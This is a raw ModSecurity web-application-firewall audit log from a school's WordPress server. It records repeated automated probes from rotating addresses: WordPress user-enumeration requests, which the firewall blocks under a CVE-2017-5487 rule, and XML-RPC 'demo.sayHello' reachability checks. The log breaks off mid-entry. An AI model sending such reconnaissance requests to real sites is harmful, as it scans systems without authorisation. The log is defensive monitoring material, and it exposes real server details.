--32f6ae4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f6ae4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298265222464 15489 (- - -) Stopwatch2: 1746298265222464 15489; combined=26398, p1=448, p2=826, p3=0, p4=0, p5=12577, sr=76, sw=0, l=0, gc=12547 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f6ae4e-Z-- --0bd6e131-A-- [04/May/2025:01:51:09 +0700] aBZlnUSOhfQ6W15Bgg8RyAAAAEc 103.236.140.4 50532 103.236.140.4 8181 --0bd6e131-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0bd6e131-C-- demo.sayHello --0bd6e131-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bd6e131-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298269512008 5830 (- - -) Stopwatch2: 1746298269512008 5830; combined=4310, p1=586, p2=3564, p3=32, p4=25, p5=62, sr=77, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bd6e131-Z-- --c6cd8f3b-A-- [04/May/2025:01:51:12 +0700] aBZloMP0ZqGY3Jj2X92cggAAAAE 103.236.140.4 50534 103.236.140.4 8181 --c6cd8f3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6cd8f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6cd8f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298272412599 2222 (- - -) Stopwatch2: 1746298272412599 2222; combined=1095, p1=345, p2=717, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6cd8f3b-Z-- --6c72e140-A-- [04/May/2025:01:51:18 +0700] aBZlpoOgvPi2IO4kz1sCIAAAAJQ 103.236.140.4 50540 103.236.140.4 8181 --6c72e140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c72e140-C-- demo.sayHello --6c72e140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c72e140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298278036127 4737 (- - -) Stopwatch2: 1746298278036127 4737; combined=3687, p1=466, p2=3021, p3=24, p4=26, p5=88, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c72e140-Z-- --e215b236-A-- [04/May/2025:01:51:48 +0700] aBZlxMP0ZqGY3Jj2X92cgwAAABY 103.236.140.4 50544 103.236.140.4 8181 --e215b236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e215b236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e215b236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298308385170 3053 (- - -) Stopwatch2: 1746298308385170 3053; combined=1273, p1=442, p2=800, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e215b236-Z-- --32572166-A-- [04/May/2025:01:51:51 +0700] aBZlx8P0ZqGY3Jj2X92chAAAABU 103.236.140.4 50548 103.236.140.4 8181 --32572166-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --32572166-C-- demo.sayHello --32572166-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --32572166-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298311353970 4643 (- - -) Stopwatch2: 1746298311353970 4643; combined=3751, p1=449, p2=2992, p3=22, p4=24, p5=145, sr=65, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32572166-Z-- --86bbe52c-A-- [04/May/2025:01:52:06 +0700] aBZl1oOgvPi2IO4kz1sCIwAAAII 103.236.140.4 50552 103.236.140.4 8181 --86bbe52c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --86bbe52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86bbe52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298326598929 2960 (- - -) Stopwatch2: 1746298326598929 2960; combined=1331, p1=471, p2=830, p3=0, p4=0, p5=30, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86bbe52c-Z-- --87c46663-A-- [04/May/2025:01:52:10 +0700] aBZl2oOgvPi2IO4kz1sCJQAAAJc 103.236.140.4 50556 103.236.140.4 8181 --87c46663-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.133 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87c46663-C-- demo.sayHello --87c46663-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87c46663-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298330001401 5480 (- - -) Stopwatch2: 1746298330001401 5480; combined=4073, p1=526, p2=3295, p3=60, p4=34, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87c46663-Z-- --d43b2158-A-- [04/May/2025:01:54:13 +0700] aBZmVYOgvPi2IO4kz1sCKwAAAIo 103.236.140.4 50570 103.236.140.4 8181 --d43b2158-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d43b2158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43b2158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298453398985 2998 (- - -) Stopwatch2: 1746298453398985 2998; combined=1340, p1=478, p2=831, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43b2158-Z-- --05ea537b-A-- [04/May/2025:01:54:19 +0700] aBZmW4OgvPi2IO4kz1sCLQAAAJI 103.236.140.4 50574 103.236.140.4 8181 --05ea537b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05ea537b-C-- demo.sayHello --05ea537b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05ea537b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298459986361 4588 (- - -) Stopwatch2: 1746298459986361 4588; combined=3583, p1=441, p2=2944, p3=24, p4=24, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05ea537b-Z-- --626f681e-A-- [04/May/2025:02:09:51 +0700] aBZp_8P0ZqGY3Jj2X92ciwAAAAA 103.236.140.4 50688 103.236.140.4 8181 --626f681e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --626f681e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --626f681e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299391761326 3250 (- - -) Stopwatch2: 1746299391761326 3250; combined=1420, p1=524, p2=860, p3=0, p4=0, p5=36, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --626f681e-Z-- --814a9f6e-A-- [04/May/2025:02:09:53 +0700] aBZqASleQJs6d7wanHHU3gAAANA 103.236.140.4 50692 103.236.140.4 8181 --814a9f6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --814a9f6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --814a9f6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299393971906 2136 (- - -) Stopwatch2: 1746299393971906 2136; combined=1077, p1=365, p2=684, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --814a9f6e-Z-- --ea32ab19-A-- [04/May/2025:02:09:56 +0700] aBZqBCleQJs6d7wanHHU3wAAAMQ 103.236.140.4 50694 103.236.140.4 8181 --ea32ab19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea32ab19-C-- demo.sayHello --ea32ab19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea32ab19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299396610601 4775 (- - -) Stopwatch2: 1746299396610601 4775; combined=3772, p1=409, p2=3151, p3=24, p4=26, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea32ab19-Z-- --de1bee7b-A-- [04/May/2025:02:09:59 +0700] aBZqB4OgvPi2IO4kz1sCNgAAAIM 103.236.140.4 50700 103.236.140.4 8181 --de1bee7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de1bee7b-C-- demo.sayHello --de1bee7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de1bee7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299399927372 5789 (- - -) Stopwatch2: 1746299399927372 5789; combined=4286, p1=511, p2=3550, p3=29, p4=32, p5=96, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de1bee7b-Z-- --9e2be359-A-- [04/May/2025:02:13:11 +0700] aBZqx4OgvPi2IO4kz1sCOgAAAIo 103.236.140.4 50728 103.236.140.4 8181 --9e2be359-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e2be359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e2be359-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299591784672 2981 (- - -) Stopwatch2: 1746299591784672 2981; combined=1306, p1=456, p2=820, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e2be359-Z-- --bd879b32-A-- [04/May/2025:02:13:16 +0700] aBZqzCleQJs6d7wanHHU4gAAAMs 103.236.140.4 50740 103.236.140.4 8181 --bd879b32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd879b32-C-- demo.sayHello --bd879b32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd879b32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299596174706 6217 (- - -) Stopwatch2: 1746299596174706 6217; combined=4580, p1=581, p2=3752, p3=41, p4=45, p5=96, sr=71, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd879b32-Z-- --7003d637-A-- [04/May/2025:02:15:41 +0700] aBZrXUSOhfQ6W15Bgg8R1wAAAFY 103.236.140.4 50750 103.236.140.4 8181 --7003d637-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7003d637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7003d637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299741389238 3398 (- - -) Stopwatch2: 1746299741389238 3398; combined=1460, p1=497, p2=928, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7003d637-Z-- --acab2f6a-A-- [04/May/2025:02:15:47 +0700] aBZrY4OgvPi2IO4kz1sCPwAAAJQ 103.236.140.4 50754 103.236.140.4 8181 --acab2f6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.250 X-Forwarded-Host: 